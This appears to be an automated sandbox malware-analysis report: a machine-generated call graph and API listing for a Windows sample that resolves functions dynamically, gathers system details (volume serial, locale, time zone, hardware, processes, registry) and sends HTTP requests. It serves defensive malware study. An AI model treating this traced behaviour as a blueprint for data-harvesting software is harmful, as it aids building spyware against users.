14687 bf45c0 2 API calls 14686->14687 14688 bf4513 14687->14688 14689 bf45c0 2 API calls 14688->14689 14690 bf452c 14689->14690 14691 bf45c0 2 API calls 14690->14691 14692 bf4545 14691->14692 14693 bf45c0 2 API calls 14692->14693 14694 bf455e 14693->14694 14695 bf45c0 2 API calls 14694->14695 14696 bf4577 14695->14696 14697 bf45c0 2 API calls 14696->14697 14698 bf4590 14697->14698 14699 bf45c0 2 API calls 14698->14699 14700 bf45a9 14699->14700 14701 c09c10 14700->14701 14702 c09c20 43 API calls 14701->14702 14703 c0a036 8 API calls 14701->14703 14702->14703 14704 c0a146 14703->14704 14705 c0a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14703->14705 14706 c0a153 8 API calls 14704->14706 14707 c0a216 14704->14707 14705->14704 14706->14707 14708 c0a298 14707->14708 14709 c0a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14707->14709 14710 c0a2a5 6 API calls 14708->14710 14711 c0a337 14708->14711 14709->14708 14710->14711 14712 c0a344 9 API calls 14711->14712 14713 c0a41f 14711->14713 14712->14713 14714 c0a4a2 14713->14714 14715 c0a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14713->14715 14716 c0a4ab GetProcAddress GetProcAddress 14714->14716 14717 c0a4dc 14714->14717 14715->14714 14716->14717 14718 c0a515 14717->14718 14719 c0a4e5 GetProcAddress GetProcAddress 14717->14719 14720 c0a612 14718->14720 14721 c0a522 10 API calls 14718->14721 14719->14718 14722 c0a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14720->14722 14723 c0a67d 14720->14723 14721->14720 14722->14723 14724 c0a686 GetProcAddress 14723->14724 14725 c0a69e 14723->14725 14724->14725 14726 c0a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14725->14726 14727 c05ca3 14725->14727 14726->14727 14728 bf1590 14727->14728 15849 bf1670 14728->15849 14731 c0a7a0 lstrcpy 14732 bf15b5 14731->14732 14733 c0a7a0 lstrcpy 14732->14733 14734 bf15c7 14733->14734 14735 c0a7a0 lstrcpy 
14734->14735 14736 bf15d9 14735->14736 14737 c0a7a0 lstrcpy 14736->14737 14738 bf1663 14737->14738 14739 c05510 14738->14739 14740 c05521 14739->14740 14741 c0a820 2 API calls 14740->14741 14742 c0552e 14741->14742 14743 c0a820 2 API calls 14742->14743 14744 c0553b 14743->14744 14745 c0a820 2 API calls 14744->14745 14746 c05548 14745->14746 14747 c0a740 lstrcpy 14746->14747 14748 c05555 14747->14748 14749 c0a740 lstrcpy 14748->14749 14750 c05562 14749->14750 14751 c0a740 lstrcpy 14750->14751 14752 c0556f 14751->14752 14753 c0a740 lstrcpy 14752->14753 14792 c0557c 14753->14792 14754 c0a740 lstrcpy 14754->14792 14755 c0a820 lstrlen lstrcpy 14755->14792 14756 c0a8a0 lstrcpy 14756->14792 14757 c05643 StrCmpCA 14757->14792 14758 c056a0 StrCmpCA 14759 c057dc 14758->14759 14758->14792 14760 c0a8a0 lstrcpy 14759->14760 14761 c057e8 14760->14761 14762 c0a820 2 API calls 14761->14762 14764 c057f6 14762->14764 14763 c051f0 20 API calls 14763->14792 14767 c0a820 2 API calls 14764->14767 14765 c05856 StrCmpCA 14766 c05991 14765->14766 14765->14792 14768 c0a8a0 lstrcpy 14766->14768 14769 c05805 14767->14769 14770 c0599d 14768->14770 14771 bf1670 lstrcpy 14769->14771 14772 c0a820 2 API calls 14770->14772 14790 c05811 14771->14790 14775 c059ab 14772->14775 14773 c05a0b StrCmpCA 14776 c05a16 Sleep 14773->14776 14777 c05a28 14773->14777 14774 c052c0 25 API calls 14774->14792 14778 c0a820 2 API calls 14775->14778 14776->14792 14779 c0a8a0 lstrcpy 14777->14779 14780 c059ba 14778->14780 14782 c05a34 14779->14782 14781 bf1670 lstrcpy 14780->14781 14781->14790 14783 c0a820 2 API calls 14782->14783 14784 c05a43 14783->14784 14785 c0a820 2 API calls 14784->14785 14786 c05a52 14785->14786 14788 bf1670 lstrcpy 14786->14788 14787 c0578a StrCmpCA 14787->14792 14788->14790 14789 c0a7a0 lstrcpy 14789->14792 14790->13846 14791 c0593f StrCmpCA 14791->14792 14792->14754 14792->14755 14792->14756 14792->14757 14792->14758 14792->14763 14792->14765 14792->14773 14792->14774 14792->14787 14792->14789 
14792->14791 14793 bf1590 lstrcpy 14792->14793 14793->14792 14795 c07553 GetVolumeInformationA 14794->14795 14796 c0754c 14794->14796 14797 c07591 14795->14797 14796->14795 14798 c075fc GetProcessHeap RtlAllocateHeap 14797->14798 14799 c07628 wsprintfA 14798->14799 14800 c07619 14798->14800 14802 c0a740 lstrcpy 14799->14802 14801 c0a740 lstrcpy 14800->14801 14803 c05da7 14801->14803 14802->14803 14803->13867 14805 c0a7a0 lstrcpy 14804->14805 14806 bf4899 14805->14806 15858 bf47b0 14806->15858 14808 bf48a5 14809 c0a740 lstrcpy 14808->14809 14810 bf48d7 14809->14810 14811 c0a740 lstrcpy 14810->14811 14812 bf48e4 14811->14812 14813 c0a740 lstrcpy 14812->14813 14814 bf48f1 14813->14814 14815 c0a740 lstrcpy 14814->14815 14816 bf48fe 14815->14816 14817 c0a740 lstrcpy 14816->14817 14818 bf490b InternetOpenA StrCmpCA 14817->14818 14819 bf4944 14818->14819 14820 bf4ecb InternetCloseHandle 14819->14820 15864 c08b60 14819->15864 14822 bf4ee8 14820->14822 15879 bf9ac0 CryptStringToBinaryA 14822->15879 14823 bf4963 15872 c0a920 14823->15872 14826 bf4976 14828 c0a8a0 lstrcpy 14826->14828 14833 bf497f 14828->14833 14829 c0a820 2 API calls 14830 bf4f05 14829->14830 14831 c0a9b0 4 API calls 14830->14831 14832 bf4f1b 14831->14832 14834 c0a8a0 lstrcpy 14832->14834 14836 c0a9b0 4 API calls 14833->14836 14837 bf4f27 codecvt 14834->14837 14835 c0a7a0 lstrcpy 14849 bf4f57 14835->14849 14838 bf49a9 14836->14838 14837->14835 14839 c0a8a0 lstrcpy 14838->14839 14840 bf49b2 14839->14840 14841 c0a9b0 4 API calls 14840->14841 14842 bf49d1 14841->14842 14843 c0a8a0 lstrcpy 14842->14843 14844 bf49da 14843->14844 14845 c0a920 3 API calls 14844->14845 14846 bf49f8 14845->14846 14847 c0a8a0 lstrcpy 14846->14847 14848 bf4a01 14847->14848 14850 c0a9b0 4 API calls 14848->14850 14849->13870 14851 bf4a20 14850->14851 14852 c0a8a0 lstrcpy 14851->14852 14853 bf4a29 14852->14853 14854 c0a9b0 4 API calls 14853->14854 14855 bf4a48 14854->14855 14856 c0a8a0 lstrcpy 14855->14856 14857 bf4a51 14856->14857 14858 
c0a9b0 4 API calls 14857->14858 14859 bf4a7d 14858->14859 14860 c0a920 3 API calls 14859->14860 14861 bf4a84 14860->14861 14862 c0a8a0 lstrcpy 14861->14862 14863 bf4a8d 14862->14863 14864 bf4aa3 InternetConnectA 14863->14864 14864->14820 14865 bf4ad3 HttpOpenRequestA 14864->14865 14867 bf4ebe InternetCloseHandle 14865->14867 14868 bf4b28 14865->14868 14867->14820 14869 c0a9b0 4 API calls 14868->14869 14870 bf4b3c 14869->14870 14871 c0a8a0 lstrcpy 14870->14871 14872 bf4b45 14871->14872 14873 c0a920 3 API calls 14872->14873 14874 bf4b63 14873->14874 14875 c0a8a0 lstrcpy 14874->14875 14876 bf4b6c 14875->14876 14877 c0a9b0 4 API calls 14876->14877 14878 bf4b8b 14877->14878 14879 c0a8a0 lstrcpy 14878->14879 14880 bf4b94 14879->14880 14881 c0a9b0 4 API calls 14880->14881 14882 bf4bb5 14881->14882 14883 c0a8a0 lstrcpy 14882->14883 14884 bf4bbe 14883->14884 14885 c0a9b0 4 API calls 14884->14885 14886 bf4bde 14885->14886 14887 c0a8a0 lstrcpy 14886->14887 14888 bf4be7 14887->14888 14889 c0a9b0 4 API calls 14888->14889 14890 bf4c06 14889->14890 14891 c0a8a0 lstrcpy 14890->14891 14892 bf4c0f 14891->14892 14893 c0a920 3 API calls 14892->14893 14894 bf4c2d 14893->14894 14895 c0a8a0 lstrcpy 14894->14895 14896 bf4c36 14895->14896 14897 c0a9b0 4 API calls 14896->14897 14898 bf4c55 14897->14898 14899 c0a8a0 lstrcpy 14898->14899 14900 bf4c5e 14899->14900 14901 c0a9b0 4 API calls 14900->14901 14902 bf4c7d 14901->14902 14903 c0a8a0 lstrcpy 14902->14903 14904 bf4c86 14903->14904 14905 c0a920 3 API calls 14904->14905 14906 bf4ca4 14905->14906 14907 c0a8a0 lstrcpy 14906->14907 14908 bf4cad 14907->14908 14909 c0a9b0 4 API calls 14908->14909 14910 bf4ccc 14909->14910 14911 c0a8a0 lstrcpy 14910->14911 14912 bf4cd5 14911->14912 14913 c0a9b0 4 API calls 14912->14913 14914 bf4cf6 14913->14914 14915 c0a8a0 lstrcpy 14914->14915 14916 bf4cff 14915->14916 14917 c0a9b0 4 API calls 14916->14917 14918 bf4d1f 14917->14918 14919 c0a8a0 lstrcpy 14918->14919 14920 bf4d28 14919->14920 14921 c0a9b0 4 API 
calls 14920->14921 14922 bf4d47 14921->14922 14923 c0a8a0 lstrcpy 14922->14923 14924 bf4d50 14923->14924 14925 c0a920 3 API calls 14924->14925 14926 bf4d6e 14925->14926 14927 c0a8a0 lstrcpy 14926->14927 14928 bf4d77 14927->14928 14929 c0a740 lstrcpy 14928->14929 14930 bf4d92 14929->14930 14931 c0a920 3 API calls 14930->14931 14932 bf4db3 14931->14932 14933 c0a920 3 API calls 14932->14933 14934 bf4dba 14933->14934 14935 c0a8a0 lstrcpy 14934->14935 14936 bf4dc6 14935->14936 14937 bf4de7 lstrlen 14936->14937 14938 bf4dfa 14937->14938 14939 bf4e03 lstrlen 14938->14939 15878 c0aad0 14939->15878 14941 bf4e13 HttpSendRequestA 14942 bf4e32 InternetReadFile 14941->14942 14943 bf4e67 InternetCloseHandle 14942->14943 14948 bf4e5e 14942->14948 14946 c0a800 14943->14946 14945 c0a9b0 4 API calls 14945->14948 14946->14867 14947 c0a8a0 lstrcpy 14947->14948 14948->14942 14948->14943 14948->14945 14948->14947 15885 c0aad0 14949->15885 14951 c017c4 StrCmpCA 14952 c017cf ExitProcess 14951->14952 14953 c017d7 14951->14953 14954 c019c2 14953->14954 14955 c018ad StrCmpCA 14953->14955 14956 c018cf StrCmpCA 14953->14956 14957 c01970 StrCmpCA 14953->14957 14958 c018f1 StrCmpCA 14953->14958 14959 c01951 StrCmpCA 14953->14959 14960 c01932 StrCmpCA 14953->14960 14961 c01913 StrCmpCA 14953->14961 14962 c0185d StrCmpCA 14953->14962 14963 c0187f StrCmpCA 14953->14963 14964 c0a820 lstrlen lstrcpy 14953->14964 14954->13872 14955->14953 14956->14953 14957->14953 14958->14953 14959->14953 14960->14953 14961->14953 14962->14953 14963->14953 14964->14953 14966 c0a7a0 lstrcpy 14965->14966 14967 bf5979 14966->14967 14968 bf47b0 2 API calls 14967->14968 14969 bf5985 14968->14969 14970 c0a740 lstrcpy 14969->14970 14971 bf59ba 14970->14971 14972 c0a740 lstrcpy 14971->14972 14973 bf59c7 14972->14973 14974 c0a740 lstrcpy 14973->14974 14975 bf59d4 14974->14975 14976 c0a740 lstrcpy 14975->14976 14977 bf59e1 14976->14977 14978 c0a740 lstrcpy 14977->14978 14979 bf59ee InternetOpenA StrCmpCA 14978->14979 14980 
bf5a1d 14979->14980 14981 bf5fc3 InternetCloseHandle 14980->14981 14982 c08b60 3 API calls 14980->14982 14983 bf5fe0 14981->14983 14984 bf5a3c 14982->14984 14986 bf9ac0 4 API calls 14983->14986 14985 c0a920 3 API calls 14984->14985 14987 bf5a4f 14985->14987 14988 bf5fe6 14986->14988 14989 c0a8a0 lstrcpy 14987->14989 14990 c0a820 2 API calls 14988->14990 14993 bf601f codecvt 14988->14993 14995 bf5a58 14989->14995 14991 bf5ffd 14990->14991 14992 c0a9b0 4 API calls 14991->14992 14994 bf6013 14992->14994 14997 c0a7a0 lstrcpy 14993->14997 14996 c0a8a0 lstrcpy 14994->14996 14998 c0a9b0 4 API calls 14995->14998 14996->14993 15006 bf604f 14997->15006 14999 bf5a82 14998->14999 15000 c0a8a0 lstrcpy 14999->15000 15001 bf5a8b 15000->15001 15002 c0a9b0 4 API calls 15001->15002 15003 bf5aaa 15002->15003 15004 c0a8a0 lstrcpy 15003->15004 15005 bf5ab3 15004->15005 15007 c0a920 3 API calls 15005->15007 15006->13878 15008 bf5ad1 15007->15008 15009 c0a8a0 lstrcpy 15008->15009 15010 bf5ada 15009->15010 15011 c0a9b0 4 API calls 15010->15011 15012 bf5af9 15011->15012 15013 c0a8a0 lstrcpy 15012->15013 15014 bf5b02 15013->15014 15015 c0a9b0 4 API calls 15014->15015 15016 bf5b21 15015->15016 15017 c0a8a0 lstrcpy 15016->15017 15018 bf5b2a 15017->15018 15019 c0a9b0 4 API calls 15018->15019 15020 bf5b56 15019->15020 15021 c0a920 3 API calls 15020->15021 15022 bf5b5d 15021->15022 15023 c0a8a0 lstrcpy 15022->15023 15024 bf5b66 15023->15024 15025 bf5b7c InternetConnectA 15024->15025 15025->14981 15026 bf5bac HttpOpenRequestA 15025->15026 15028 bf5c0b 15026->15028 15029 bf5fb6 InternetCloseHandle 15026->15029 15030 c0a9b0 4 API calls 15028->15030 15029->14981 15031 bf5c1f 15030->15031 15032 c0a8a0 lstrcpy 15031->15032 15033 bf5c28 15032->15033 15034 c0a920 3 API calls 15033->15034 15035 bf5c46 15034->15035 15036 c0a8a0 lstrcpy 15035->15036 15037 bf5c4f 15036->15037 15038 c0a9b0 4 API calls 15037->15038 15039 bf5c6e 15038->15039 15040 c0a8a0 lstrcpy 15039->15040 15041 bf5c77 15040->15041 15042 
c0a9b0 4 API calls 15041->15042 15043 bf5c98 15042->15043 15044 c0a8a0 lstrcpy 15043->15044 15045 bf5ca1 15044->15045 15046 c0a9b0 4 API calls 15045->15046 15047 bf5cc1 15046->15047 15048 c0a8a0 lstrcpy 15047->15048 15049 bf5cca 15048->15049 15050 c0a9b0 4 API calls 15049->15050 15051 bf5ce9 15050->15051 15052 c0a8a0 lstrcpy 15051->15052 15053 bf5cf2 15052->15053 15054 c0a920 3 API calls 15053->15054 15055 bf5d10 15054->15055 15056 c0a8a0 lstrcpy 15055->15056 15057 bf5d19 15056->15057 15058 c0a9b0 4 API calls 15057->15058 15059 bf5d38 15058->15059 15060 c0a8a0 lstrcpy 15059->15060 15061 bf5d41 15060->15061 15062 c0a9b0 4 API calls 15061->15062 15063 bf5d60 15062->15063 15064 c0a8a0 lstrcpy 15063->15064 15065 bf5d69 15064->15065 15066 c0a920 3 API calls 15065->15066 15067 bf5d87 15066->15067 15068 c0a8a0 lstrcpy 15067->15068 15069 bf5d90 15068->15069 15070 c0a9b0 4 API calls 15069->15070 15071 bf5daf 15070->15071 15072 c0a8a0 lstrcpy 15071->15072 15073 bf5db8 15072->15073 15074 c0a9b0 4 API calls 15073->15074 15075 bf5dd9 15074->15075 15076 c0a8a0 lstrcpy 15075->15076 15077 bf5de2 15076->15077 15078 c0a9b0 4 API calls 15077->15078 15079 bf5e02 15078->15079 15080 c0a8a0 lstrcpy 15079->15080 15081 bf5e0b 15080->15081 15082 c0a9b0 4 API calls 15081->15082 15083 bf5e2a 15082->15083 15084 c0a8a0 lstrcpy 15083->15084 15085 bf5e33 15084->15085 15086 c0a920 3 API calls 15085->15086 15087 bf5e54 15086->15087 15088 c0a8a0 lstrcpy 15087->15088 15089 bf5e5d 15088->15089 15090 bf5e70 lstrlen 15089->15090 15886 c0aad0 15090->15886 15092 bf5e81 lstrlen GetProcessHeap RtlAllocateHeap 15887 c0aad0 15092->15887 15094 bf5eae lstrlen 15095 bf5ebe 15094->15095 15096 bf5ed7 lstrlen 15095->15096 15097 bf5ee7 15096->15097 15098 bf5ef0 lstrlen 15097->15098 15099 bf5f04 15098->15099 15100 bf5f1a lstrlen 15099->15100 15888 c0aad0 15100->15888 15102 bf5f2a HttpSendRequestA 15103 bf5f35 InternetReadFile 15102->15103 15104 bf5f6a InternetCloseHandle 15103->15104 15108 bf5f61 15103->15108 
15104->15029 15106 c0a9b0 4 API calls 15106->15108 15107 c0a8a0 lstrcpy 15107->15108 15108->15103 15108->15104 15108->15106 15108->15107 15111 c01077 15109->15111 15110 c01151 15110->13880 15111->15110 15112 c0a820 lstrlen lstrcpy 15111->15112 15112->15111 15115 c00db7 15113->15115 15114 c00f17 15114->13888 15115->15114 15116 c00ea4 StrCmpCA 15115->15116 15117 c00e27 StrCmpCA 15115->15117 15118 c00e67 StrCmpCA 15115->15118 15119 c0a820 lstrlen lstrcpy 15115->15119 15116->15115 15117->15115 15118->15115 15119->15115 15122 c00f67 15120->15122 15121 c01044 15121->13896 15122->15121 15123 c00fb2 StrCmpCA 15122->15123 15124 c0a820 lstrlen lstrcpy 15122->15124 15123->15122 15124->15122 15126 c0a740 lstrcpy 15125->15126 15127 c01a26 15126->15127 15128 c0a9b0 4 API calls 15127->15128 15129 c01a37 15128->15129 15130 c0a8a0 lstrcpy 15129->15130 15131 c01a40 15130->15131 15132 c0a9b0 4 API calls 15131->15132 15133 c01a5b 15132->15133 15134 c0a8a0 lstrcpy 15133->15134 15135 c01a64 15134->15135 15136 c0a9b0 4 API calls 15135->15136 15137 c01a7d 15136->15137 15138 c0a8a0 lstrcpy 15137->15138 15139 c01a86 15138->15139 15140 c0a9b0 4 API calls 15139->15140 15141 c01aa1 15140->15141 15142 c0a8a0 lstrcpy 15141->15142 15143 c01aaa 15142->15143 15144 c0a9b0 4 API calls 15143->15144 15145 c01ac3 15144->15145 15146 c0a8a0 lstrcpy 15145->15146 15147 c01acc 15146->15147 15148 c0a9b0 4 API calls 15147->15148 15149 c01ae7 15148->15149 15150 c0a8a0 lstrcpy 15149->15150 15151 c01af0 15150->15151 15152 c0a9b0 4 API calls 15151->15152 15153 c01b09 15152->15153 15154 c0a8a0 lstrcpy 15153->15154 15155 c01b12 15154->15155 15156 c0a9b0 4 API calls 15155->15156 15157 c01b2d 15156->15157 15158 c0a8a0 lstrcpy 15157->15158 15159 c01b36 15158->15159 15160 c0a9b0 4 API calls 15159->15160 15161 c01b4f 15160->15161 15162 c0a8a0 lstrcpy 15161->15162 15163 c01b58 15162->15163 15164 c0a9b0 4 API calls 15163->15164 15165 c01b76 15164->15165 15166 c0a8a0 lstrcpy 15165->15166 15167 c01b7f 15166->15167 15168 
c07500 6 API calls 15167->15168 15169 c01b96 15168->15169 15170 c0a920 3 API calls 15169->15170 15171 c01ba9 15170->15171 15172 c0a8a0 lstrcpy 15171->15172 15173 c01bb2 15172->15173 15174 c0a9b0 4 API calls 15173->15174 15175 c01bdc 15174->15175 15176 c0a8a0 lstrcpy 15175->15176 15177 c01be5 15176->15177 15178 c0a9b0 4 API calls 15177->15178 15179 c01c05 15178->15179 15180 c0a8a0 lstrcpy 15179->15180 15181 c01c0e 15180->15181 15889 c07690 GetProcessHeap RtlAllocateHeap 15181->15889 15184 c0a9b0 4 API calls 15185 c01c2e 15184->15185 15186 c0a8a0 lstrcpy 15185->15186 15187 c01c37 15186->15187 15188 c0a9b0 4 API calls 15187->15188 15189 c01c56 15188->15189 15190 c0a8a0 lstrcpy 15189->15190 15191 c01c5f 15190->15191 15192 c0a9b0 4 API calls 15191->15192 15193 c01c80 15192->15193 15194 c0a8a0 lstrcpy 15193->15194 15195 c01c89 15194->15195 15896 c077c0 GetCurrentProcess IsWow64Process 15195->15896 15198 c0a9b0 4 API calls 15199 c01ca9 15198->15199 15200 c0a8a0 lstrcpy 15199->15200 15201 c01cb2 15200->15201 15202 c0a9b0 4 API calls 15201->15202 15203 c01cd1 15202->15203 15204 c0a8a0 lstrcpy 15203->15204 15205 c01cda 15204->15205 15206 c0a9b0 4 API calls 15205->15206 15207 c01cfb 15206->15207 15208 c0a8a0 lstrcpy 15207->15208 15209 c01d04 15208->15209 15210 c07850 3 API calls 15209->15210 15211 c01d14 15210->15211 15212 c0a9b0 4 API calls 15211->15212 15213 c01d24 15212->15213 15214 c0a8a0 lstrcpy 15213->15214 15215 c01d2d 15214->15215 15216 c0a9b0 4 API calls 15215->15216 15217 c01d4c 15216->15217 15218 c0a8a0 lstrcpy 15217->15218 15219 c01d55 15218->15219 15220 c0a9b0 4 API calls 15219->15220 15221 c01d75 15220->15221 15222 c0a8a0 lstrcpy 15221->15222 15223 c01d7e 15222->15223 15224 c078e0 3 API calls 15223->15224 15225 c01d8e 15224->15225 15226 c0a9b0 4 API calls 15225->15226 15227 c01d9e 15226->15227 15228 c0a8a0 lstrcpy 15227->15228 15229 c01da7 15228->15229 15230 c0a9b0 4 API calls 15229->15230 15231 c01dc6 15230->15231 15232 c0a8a0 lstrcpy 15231->15232 15233 c01dcf 
15232->15233 15234 c0a9b0 4 API calls 15233->15234 15235 c01df0 15234->15235 15236 c0a8a0 lstrcpy 15235->15236 15237 c01df9 15236->15237 15898 c07980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15237->15898 15240 c0a9b0 4 API calls 15241 c01e19 15240->15241 15242 c0a8a0 lstrcpy 15241->15242 15243 c01e22 15242->15243 15244 c0a9b0 4 API calls 15243->15244 15245 c01e41 15244->15245 15246 c0a8a0 lstrcpy 15245->15246 15247 c01e4a 15246->15247 15248 c0a9b0 4 API calls 15247->15248 15249 c01e6b 15248->15249 15250 c0a8a0 lstrcpy 15249->15250 15251 c01e74 15250->15251 15900 c07a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15251->15900 15254 c0a9b0 4 API calls 15255 c01e94 15254->15255 15256 c0a8a0 lstrcpy 15255->15256 15257 c01e9d 15256->15257 15258 c0a9b0 4 API calls 15257->15258 15259 c01ebc 15258->15259 15260 c0a8a0 lstrcpy 15259->15260 15261 c01ec5 15260->15261 15262 c0a9b0 4 API calls 15261->15262 15263 c01ee5 15262->15263 15264 c0a8a0 lstrcpy 15263->15264 15265 c01eee 15264->15265 15903 c07b00 GetUserDefaultLocaleName 15265->15903 15268 c0a9b0 4 API calls 15269 c01f0e 15268->15269 15270 c0a8a0 lstrcpy 15269->15270 15271 c01f17 15270->15271 15272 c0a9b0 4 API calls 15271->15272 15273 c01f36 15272->15273 15274 c0a8a0 lstrcpy 15273->15274 15275 c01f3f 15274->15275 15276 c0a9b0 4 API calls 15275->15276 15277 c01f60 15276->15277 15278 c0a8a0 lstrcpy 15277->15278 15279 c01f69 15278->15279 15907 c07b90 15279->15907 15281 c01f80 15282 c0a920 3 API calls 15281->15282 15283 c01f93 15282->15283 15284 c0a8a0 lstrcpy 15283->15284 15285 c01f9c 15284->15285 15286 c0a9b0 4 API calls 15285->15286 15287 c01fc6 15286->15287 15288 c0a8a0 lstrcpy 15287->15288 15289 c01fcf 15288->15289 15290 c0a9b0 4 API calls 15289->15290 15291 c01fef 15290->15291 15292 c0a8a0 lstrcpy 15291->15292 15293 c01ff8 15292->15293 15919 c07d80 GetSystemPowerStatus 15293->15919 15296 c0a9b0 4 API calls 15297 c02018 15296->15297 15298 c0a8a0 lstrcpy 15297->15298 15299 c02021 15298->15299 15300 
c0a9b0 4 API calls 15299->15300 15301 c02040 15300->15301 15302 c0a8a0 lstrcpy 15301->15302 15303 c02049 15302->15303 15304 c0a9b0 4 API calls 15303->15304 15305 c0206a 15304->15305 15306 c0a8a0 lstrcpy 15305->15306 15307 c02073 15306->15307 15308 c0207e GetCurrentProcessId 15307->15308 15921 c09470 OpenProcess 15308->15921 15311 c0a920 3 API calls 15312 c020a4 15311->15312 15313 c0a8a0 lstrcpy 15312->15313 15314 c020ad 15313->15314 15315 c0a9b0 4 API calls 15314->15315 15316 c020d7 15315->15316 15317 c0a8a0 lstrcpy 15316->15317 15318 c020e0 15317->15318 15319 c0a9b0 4 API calls 15318->15319 15320 c02100 15319->15320 15321 c0a8a0 lstrcpy 15320->15321 15322 c02109 15321->15322 15926 c07e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15322->15926 15325 c0a9b0 4 API calls 15326 c02129 15325->15326 15327 c0a8a0 lstrcpy 15326->15327 15328 c02132 15327->15328 15329 c0a9b0 4 API calls 15328->15329 15330 c02151 15329->15330 15331 c0a8a0 lstrcpy 15330->15331 15332 c0215a 15331->15332 15333 c0a9b0 4 API calls 15332->15333 15334 c0217b 15333->15334 15335 c0a8a0 lstrcpy 15334->15335 15336 c02184 15335->15336 15930 c07f60 15336->15930 15339 c0a9b0 4 API calls 15340 c021a4 15339->15340 15341 c0a8a0 lstrcpy 15340->15341 15342 c021ad 15341->15342 15343 c0a9b0 4 API calls 15342->15343 15344 c021cc 15343->15344 15345 c0a8a0 lstrcpy 15344->15345 15346 c021d5 15345->15346 15347 c0a9b0 4 API calls 15346->15347 15348 c021f6 15347->15348 15349 c0a8a0 lstrcpy 15348->15349 15350 c021ff 15349->15350 15943 c07ed0 GetSystemInfo wsprintfA 15350->15943 15353 c0a9b0 4 API calls 15354 c0221f 15353->15354 15355 c0a8a0 lstrcpy 15354->15355 15356 c02228 15355->15356 15357 c0a9b0 4 API calls 15356->15357 15358 c02247 15357->15358 15359 c0a8a0 lstrcpy 15358->15359 15360 c02250 15359->15360 15361 c0a9b0 4 API calls 15360->15361 15362 c02270 15361->15362 15363 c0a8a0 lstrcpy 15362->15363 15364 c02279 15363->15364 15945 c08100 GetProcessHeap RtlAllocateHeap 15364->15945 15367 c0a9b0 4 API calls 15368 
c02299 15367->15368 15369 c0a8a0 lstrcpy 15368->15369 15370 c022a2 15369->15370 15371 c0a9b0 4 API calls 15370->15371 15372 c022c1 15371->15372 15373 c0a8a0 lstrcpy 15372->15373 15374 c022ca 15373->15374 15375 c0a9b0 4 API calls 15374->15375 15376 c022eb 15375->15376 15377 c0a8a0 lstrcpy 15376->15377 15378 c022f4 15377->15378 15951 c087c0 15378->15951 15381 c0a920 3 API calls 15382 c0231e 15381->15382 15383 c0a8a0 lstrcpy 15382->15383 15384 c02327 15383->15384 15385 c0a9b0 4 API calls 15384->15385 15386 c02351 15385->15386 15387 c0a8a0 lstrcpy 15386->15387 15388 c0235a 15387->15388 15389 c0a9b0 4 API calls 15388->15389 15390 c0237a 15389->15390 15391 c0a8a0 lstrcpy 15390->15391 15392 c02383 15391->15392 15393 c0a9b0 4 API calls 15392->15393 15394 c023a2 15393->15394 15395 c0a8a0 lstrcpy 15394->15395 15396 c023ab 15395->15396 15956 c081f0 15396->15956 15398 c023c2 15399 c0a920 3 API calls 15398->15399 15400 c023d5 15399->15400 15401 c0a8a0 lstrcpy 15400->15401 15402 c023de 15401->15402 15403 c0a9b0 4 API calls 15402->15403 15404 c0240a 15403->15404 15405 c0a8a0 lstrcpy 15404->15405 15406 c02413 15405->15406 15407 c0a9b0 4 API calls 15406->15407 15408 c02432 15407->15408 15409 c0a8a0 lstrcpy 15408->15409 15410 c0243b 15409->15410 15411 c0a9b0 4 API calls 15410->15411 15412 c0245c 15411->15412 15413 c0a8a0 lstrcpy 15412->15413 15414 c02465 15413->15414 15415 c0a9b0 4 API calls 15414->15415 15416 c02484 15415->15416 15417 c0a8a0 lstrcpy 15416->15417 15418 c0248d 15417->15418 15419 c0a9b0 4 API calls 15418->15419 15420 c024ae 15419->15420 15421 c0a8a0 lstrcpy 15420->15421 15422 c024b7 15421->15422 15964 c08320 15422->15964 15424 c024d3 15425 c0a920 3 API calls 15424->15425 15426 c024e6 15425->15426 15427 c0a8a0 lstrcpy 15426->15427 15428 c024ef 15427->15428 15429 c0a9b0 4 API calls 15428->15429 15430 c02519 15429->15430 15431 c0a8a0 lstrcpy 15430->15431 15432 c02522 15431->15432 15433 c0a9b0 4 API calls 15432->15433 15434 c02543 15433->15434 15435 c0a8a0 lstrcpy 

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 c09860-c09874 call c09750 663 c09a93-c09af2 LoadLibraryA * 5 660->663 664 c0987a-c09a8e call c09780 GetProcAddress * 21 660->664 665 c09af4-c09b08 GetProcAddress 663->665 666 c09b0d-c09b14 663->666 664->663 665->666 669 c09b46-c09b4d 666->669 670 c09b16-c09b41 GetProcAddress * 2 666->670 671 c09b68-c09b6f 669->671 672 c09b4f-c09b63 GetProcAddress 669->672 670->669 673 c09b71-c09b84 GetProcAddress 671->673 674 c09b89-c09b90 671->674 672->671 673->674 675 c09bc1-c09bc2 674->675 676 c09b92-c09bbc GetProcAddress * 2 674->676 676->675
                          APIs
                          • GetProcAddress.KERNEL32(75900000,006E0588), ref: 00C098A1
                          • GetProcAddress.KERNEL32(75900000,006E05A0), ref: 00C098BA
                          • GetProcAddress.KERNEL32(75900000,006E06C0), ref: 00C098D2
                          • GetProcAddress.KERNEL32(75900000,006E05B8), ref: 00C098EA
                          • GetProcAddress.KERNEL32(75900000,006E0690), ref: 00C09903
                          • GetProcAddress.KERNEL32(75900000,006E87F0), ref: 00C0991B
                          • GetProcAddress.KERNEL32(75900000,006D66A0), ref: 00C09933
                          • GetProcAddress.KERNEL32(75900000,006D6A20), ref: 00C0994C
                          • GetProcAddress.KERNEL32(75900000,006E05D0), ref: 00C09964
                          • GetProcAddress.KERNEL32(75900000,006E0768), ref: 00C0997C
                          • GetProcAddress.KERNEL32(75900000,006E06D8), ref: 00C09995
                          • GetProcAddress.KERNEL32(75900000,006E0630), ref: 00C099AD
                          • GetProcAddress.KERNEL32(75900000,006D6680), ref: 00C099C5
                          • GetProcAddress.KERNEL32(75900000,006E06F0), ref: 00C099DE
                          • GetProcAddress.KERNEL32(75900000,006E05E8), ref: 00C099F6
                          • GetProcAddress.KERNEL32(75900000,006D6A00), ref: 00C09A0E
                          • GetProcAddress.KERNEL32(75900000,006E0708), ref: 00C09A27
                          • GetProcAddress.KERNEL32(75900000,006E0780), ref: 00C09A3F
